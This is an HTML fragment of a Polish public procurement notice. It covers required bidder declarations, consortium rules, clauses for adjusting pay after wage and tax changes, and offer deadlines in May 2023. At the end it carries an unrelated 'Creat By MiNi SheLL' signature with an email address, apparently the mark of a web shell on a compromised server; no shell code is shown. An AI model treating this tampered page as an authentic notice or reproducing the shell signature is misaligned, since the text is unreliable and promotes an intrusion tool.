<h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na etapie składania oferty Zamawiający wymaga złożenia przez wykonawców następujących dokumentów:<br/><br/>1. Oświadczenie wstępnie potwierdzające spełnienie przez wykonawcę warunków udziału w postępowaniu oraz brak przesłanek do wykluczenia, o którym mowa w art. 125 ust. 1 uPzp zgodnie z załącznikiem nr 6 do SWZ, składane za pomocą środków komunikacji elektronicznej w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XIII SWZ.<br/>2. Formularz ofertowy (stanowiący treść oferty), zgodnie z załącznikiem nr 1 do SWZ, składany za pomocą środków komunikacji elektronicznej w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym na zasadach określonych w rozdziale XIII SWZ.<br/>3. Jeżeli wykonawca polega na zdolnościach lub sytuacji innego podmiotu (zwany w niniejszym dokumencie jako: ,,podmiot udostępniający”) na zasadach określonych w art. 266 w zw. z art. 118 uPzp, w celu dysponowania niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego Zamawiający wymaga przedłożenia:<br/>a) zobowiązania podmiotu udostępniającego, zgodnie ze wzorem, stanowiącym załącznik<br/>nr 9 do SWZ, które będzie określało:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów<br/>podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia.<br/>b) w celu wstępnego wykazania braku istnienia wobec podmiotu udostępniającego podstaw do<br/>wykluczenia, a także spełniania warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na zasoby podmiotu udostępniającego, wykonawca składa oświadczenie wstępne, o którym mowa w ust. 1 wypełnione przez podmiot udostępniający zgodnie ze wzorem, który stanowiącym załącznik nr 6 do SWZ.<br/>4. Pełnomocnictwo do reprezentowania Wykonawcy – w przypadku złożenia oferty przez pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>5. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie wskazania, które usługi wykonają poszczególni Wykonawcy (członkowie konsorcjum lub spółki<br/>cywilnej). Wzór oświadczenia stanowi załącznik nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenia i dokumenty Wykonawców występujących wspólnie:<br/>1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. W związku z tym należy wskazane pełnomocnictwo złożyć wraz z<br/>ofertą.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać<br/>na zdolnościach tych<br/>z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>3) W przypadku, o którym mowa w pkt. 2 , wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie (według wzoru stanowiącego załącznik nr 8<br/>do SWZ), z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4) Wykonawcy występujący wspólnie powinni złożyć oświadczenia i dokumenty, o których<br/>mowa<br/>w niniejszym rozdziale SWZ, z tym, że oświadczenie wstępne wymienione w ust. 1<br/>niniejszego rozdziału SWZ (oświadczenie wg wzoru stanowiącego załącznik nr 6 do SWZ)<br/>oraz dokumenty wskazane w ust. 8 pkt 3 niniejszego rozdziału SWZ (dokumenty<br/>potwierdzające brak przesłanek do wykluczenia wykonawcy) składa każdy Wykonawca z<br/>osobna, natomiast pozostałe dokumenty lub oświadczenia potwierdzające spełnianie<br/>warunków udziału w postępowaniu określonych przez Zamawiającego mogą być składane<br/>wspólnie.<br/>5) Dokument o którym mowa w ust. 1 niniejszego rozdziału SWZ (oświadczenie wg wzoru<br/>stanowiącego załącznik nr 6 do SWZ) powinien potwierdzać spełnianie warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>6) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego kluczowych<br/>zadań dotyczących przedmiotowego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Jeżeli w trakcie realizacji umowy nastąpi:<br/>1)	zmiana stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2)	zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów Rozporządzenia Rady Ministrów z dnia 13 września 2022 r. w sprawie wysokości minimalnego wynagrodzenia za pracę oraz wysokości minimalnej stawki godzinowej w 2023 r (Dz.U. z 2022 r. poz. 1952), przy czym Wykonawca ma obowiązek skalkulować w swojej cenie ofertowej waloryzację wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, która będzie miała miejsce od 1 lipca 2023 roku,<br/>3)	zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4)	zmiana zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych, a zmiany te będą miały wpływ na koszty wykonania umowy, <br/> - zastosowanie mają zasady wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy określone w ust. 2-8 poniżej.<br/>2.	Zmiana wysokości wynagrodzenia wymaga zmiany umowy w drodze aneksu.<br/>3.	Wykonawca najpóźniej w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających zmiany, o których mowa w ust. 8 uprawniony jest do wystąpienia do Zamawiającego z pisemnym wnioskiem o dokonanie zmiany umowy w zakresie wysokości wynagrodzenia wraz z jej uzasadnieniem oraz dokumentami niezbędnymi do oceny przez Zamawiającego, czy zmiany, o których mowa w ust. 8, mają wpływ na koszty wykonania umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wysokości wynagrodzenia Wykonawcy określonego <br/>w niniejszej umowie, a w szczególności:<br/>1)	szczegółową kalkulację proponowanej zmienionej wysokości wynagrodzenia Wykonawcy oraz wykazanie adekwatności propozycji do zmiany wysokości kosztów wykonania umowy przez Wykonawcę,<br/>2)	przyjęte przez Wykonawcę zasady kalkulacji wysokości kosztów wykonania umowy oraz założenia co do wysokości dotychczasowych oraz przyszłych kosztów wykonania umowy, wraz z dokumentami potwierdzającymi prawidłowość przyjętych założeń - takimi jak np. umowy o pracę, dokumenty potwierdzające zgłoszenie pracowników do ubezpieczeń.<br/>4.	W terminie 30 dni od otrzymania wniosku, o którym mowa w ust. 10, Zamawiający może zwrócić się do Wykonawcy o jego uzupełnienie lub przekazanie dodatkowych wyjaśnień lub dokumentów (np. zażądać: oryginałów do wglądu, przekazania kopii dokumentów potwierdzonych za zgodność z oryginałem).<br/>5.	Zamawiający w terminie 30 dni od dnia otrzymania kompletnego wniosku zajmie <br/>w stosunku do niego pisemne stanowisko. Za dzień przekazania stanowiska uznaje się dzień jego wysłania na adres właściwy dla doręczeń pism dla Wykonawcy.<br/>6.	Zamawiający najpóźniej w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających zmiany, o których mowa w ust. 8 może przekazać Wykonawcy pisemny wniosek o dokonanie zmiany umowy. Wniosek powinien zawierać co najmniej propozycję zmiany umowy w zakresie wysokości wynagrodzenia oraz powołanie zmian przepisów.<br/>7.	Zamawiający może zwrócić się do Wykonawcy o złożenie wyjaśnień lub dokumentów (oryginałów do wglądu lub kopii potwierdzonych za zgodność z oryginałem) niezbędnych do oceny przez Zamawiającego, czy zmiany, o których mowa wyżej, mają wpływ na koszty wykonania umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wysokości wynagrodzenia. Rodzaj i zakres tych informacji określi Zamawiający. Postanowienia ust. 2-4 stosuje się odpowiednio, z tym, że Wykonawca jest zobowiązany w każdym przypadku do zajęcia pisemnego stanowiska w terminie 30 dni od dnia otrzymania wniosku od Zamawiającego.<br/><br/>Pozostałe przesłanki zmiany treści umowy zostały wskazane w par. 4 wzoru umowy (załącznik nr 4 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-04 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com